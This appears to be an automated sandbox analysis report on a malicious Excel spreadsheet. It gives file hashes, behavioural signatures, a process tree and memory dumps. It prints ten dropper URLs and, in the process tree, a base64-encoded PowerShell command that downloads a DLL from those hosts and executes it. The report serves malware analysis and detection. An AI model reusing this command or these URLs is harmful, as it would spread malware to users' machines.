Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 00:28

General

  • Target

    5b00c5f6e1b192858bf64564ebfd60bcce35442ce78fc0100f1cbac04bc57fca.xls

  • Size

    144KB

  • MD5

    0fbc6c107087ed9cd9e3fe4ee3ca0546

  • SHA1

    38a3275b96c5ad0e6062580eac6ac16ba173785a

  • SHA256

    5b00c5f6e1b192858bf64564ebfd60bcce35442ce78fc0100f1cbac04bc57fca

  • SHA512

    a2da6df30aaa0c3dd846ddc65827f6d3ca9e6d23b7b10e41cf2b53ce99f96636187da3ac6796030be810608b34b93c995c8e9d919d8d0e5f2fde3b3764d15c08

  • SSDEEP

    3072:E7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TIfGxX:2cKoSsxzNDZLDZjlbR868O8K0c03D387

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://four.renovatiog.ltd/wp-includes/KGzoB0zsRKZjjEe/

exe.dropper

http://adultfriendfinder-adultfriends.com/mmfdoublepenetrationadultfriends/0pcEeJPfwMU/

exe.dropper

http://jwellery.fameitc.com/wp-includes/wQK7z9cEcwWCUG/

exe.dropper

http://arcgakuin-dev2.sukoburu-secure.com/l35uhr/R1evmjjhga/

exe.dropper

http://bimesarayenovin.ir/wp-admin/z464/

exe.dropper

http://hostfeeling.com/wp-admin/DidtoZk2EEc7BWXyhh/

exe.dropper

http://gardeningfilm.com/wp-content/Ef/

exe.dropper

http://moneymagnetentertainment.com/pz66t8y/Bd0sR0htA8mHibNJrk/

exe.dropper

https://100lamp.com.ua:443/sale/a/

exe.dropper

http://queenofluv.com/uemsub/peLSdHCvfhkge/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5b00c5f6e1b192858bf64564ebfd60bcce35442ce78fc0100f1cbac04bc57fca.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1940
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\programdata\uylcsekn.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AZgBvAHUAcgAuAHIAZQBuAG8AdgBhAHQAaQBvAGcALgBsAHQAZAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEsARwB6AG8AQgAwAHoAcwBSAEsAWgBqAGoARQBlAC8ALABoAHQAdABwADoALwAvAGEAZAB1AGwAdABmAHIAaQBlAG4AZABmAGkAbgBkAGUAcgAtAGEAZAB1AGwAdABmAHIAaQBlAG4AZABzAC4AYwBvAG0ALwBtAG0AZgBkAG8AdQBiAGwAZQBwAGUAbgBlAHQAcgBhAHQAaQBvAG4AYQBkAHUAbAB0AGYAcgBpAGUAbgBkAHMALwAwAHAAYwBFAGUASgBQAGYAdwBNAFUALwAsAGgAdAB0AHAAOgAvAC8AagB3AGUAbABsAGUAcgB5AC4AZgBhAG0AZQBpAHQAYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdwBRAEsANwB6ADkAYwBFAGMAdwBXAEMAVQBHAC8ALABoAHQAdABwADoALwAvAGEAcgBjAGcAYQBrAHUAaQBuAC0AZABlAHYAMgAuAHMAdQBrAG8AYgB1AHIAdQAtAHMAZQBjAHUAcgBlAC4AYwBvAG0ALwBsADMANQB1AGgAcgAvAFIAMQBlAHYAbQBqAGoAaABnAGEALwAsAGgAdAB0AHAAOgAvAC8AYgBpAG0AZQBzAGEAcgBhAHkAZQBuAG8AdgBpAG4ALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwB6ADQANgA0AC8ALABoAHQAdABwADoALwAvAGgAbwBzAHQAZgBlAGUAbABpAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ARABpAGQAdABvAFoAawAyAEUARQBjADcAQgBXAFgAeQBoAGgALwAsAGgAdAB0AHAAOgAvAC8AZwBhAHIAZABlAG4AaQBuAGcAZgBpAGwAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEUAZgAvACwAaAB0AHQAcAA6AC8ALwBtAG8AbgBlAHkAbQBhAGcAbgBlAHQAZQBuAHQAZQByAHQAYQBpAG4AbQBlAG4AdAAuAGMAbwBtAC8AcAB6ADYANgB0ADgAeQAvAEIAZAAwAHMAUgAwAGgAdABBADgAbQBIAGkAYgBOAEoAcgBrAC8ALABoAHQAdABwAHMAOgAvAC8AMQAwADAAbABhAG0AcAAuAGMAbwBtAC4AdQBhADoANAA0ADMALwBzAGEAbABlAC8AYQAvACwAaAB0AHQAcAA6AC8ALwBxAHUAZQBlAG4AbwBmAGwAdQB2AC4AYwBvAG0ALwB1AGUAbQBzAHUAYgAvAHAAZQBMAFMAZABIAEMAdgBmAGgAawBnAGUALwAiAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHMAdAAgAGkAbgAgACQAcgBvAHcAaQBmAGkAdQBkACkAewAkAHIAcgB5AGkAdQBkAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAZgBnAGgAaQB1AHMAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcACIAKwAkAHIAcgB5AGkAdQBkACsAIgAuAGQAbABsACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABzAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAOwBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAHsAaQBmACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAA1ADAAMAAwADAAKQB7ACQAZwBoAEQARABGAEoASABrADUAZgA9ACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHcAbwB3ADYANABcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwAkAHQAeQBpAGQAdQBpAHMAZABmAGYAPQAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKwAiACwAZgAiACsAJABmAGcAaABpAHUAcwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGcAaABEAEQARgBKAEgAawA1AGYAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJAB0AHkAaQBkAHUAaQBzAGQAZgBmADsAYgByAGUAYQBrADsAfQB9AH0A
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2408

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idr1ae5w.t5s.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    6eba694c26022f7f1839b3be30312e9c

    SHA1

    e6801f13bb9c2b7b0faedf7a9838cbe87334c52d

    SHA256

    341e55afbd2f48322acd947920d88b93f197603e2698193fb5e2e2b5c0a35329

    SHA512

    8eefb6ca4f414d27234635cb852520f78fdb8d143f7045f528f1141f47b46ed24bc5938124ea1127df094fcf1ef0b56393a7d783a63f295c7cb9838b3334bf42

  • C:\programdata\uylcsekn.bat

    Filesize

    3KB

    MD5

    b3e87e4fda09592bebf3522c319e8b79

    SHA1

    dc061034bbcc3a397e046b5e512ed0235a397fac

    SHA256

    d47ce3fd5ecb89f6a9ab9c71b1541f27236da06a39732efdee85cbaf093a8246

    SHA512

    9b1576eea10d6d70fc8e33bf3df994ae0d02ae6c963c6baa270f095ced7240aae85501a92c9e7f0f6b25d65f356deff4aa644d6073d39d455d15d864e12e7477

  • memory/1940-9-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-6-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-20-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-5-0x00007FFFB4F30000-0x00007FFFB4F40000-memory.dmp

    Filesize

    64KB

  • memory/1940-8-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-0-0x00007FFFB4F30000-0x00007FFFB4F40000-memory.dmp

    Filesize

    64KB

  • memory/1940-7-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-10-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-12-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-13-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-11-0x00007FFFB2AB0000-0x00007FFFB2AC0000-memory.dmp

    Filesize

    64KB

  • memory/1940-14-0x00007FFFB2AB0000-0x00007FFFB2AC0000-memory.dmp

    Filesize

    64KB

  • memory/1940-16-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-18-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-1-0x00007FFFF4F4D000-0x00007FFFF4F4E000-memory.dmp

    Filesize

    4KB

  • memory/1940-4-0x00007FFFB4F30000-0x00007FFFB4F40000-memory.dmp

    Filesize

    64KB

  • memory/1940-19-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-17-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-15-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-36-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-39-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-2-0x00007FFFB4F30000-0x00007FFFB4F40000-memory.dmp

    Filesize

    64KB

  • memory/1940-21-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-3-0x00007FFFB4F30000-0x00007FFFB4F40000-memory.dmp

    Filesize

    64KB

  • memory/1940-108-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-105-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1940-106-0x00007FFFF4F4D000-0x00007FFFF4F4E000-memory.dmp

    Filesize

    4KB

  • memory/1940-107-0x00007FFFF4EB0000-0x00007FFFF50A5000-memory.dmp

    Filesize

    2.0MB

  • memory/2408-101-0x000001256F830000-0x000001256FFD6000-memory.dmp

    Filesize

    7.6MB

  • memory/2408-95-0x000001256EB00000-0x000001256EB22000-memory.dmp

    Filesize

    136KB